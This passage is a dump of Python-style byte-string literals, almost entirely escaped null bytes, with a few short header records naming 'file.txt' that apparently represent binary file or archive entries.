x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
# b'\x00\x01\x00\x00 \x00file.txt\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
# b'\x00\x01\x00\x00\x10\x00file.txt\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
# b'\x00\x01\x00\x00\xe0\x00file.txt\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x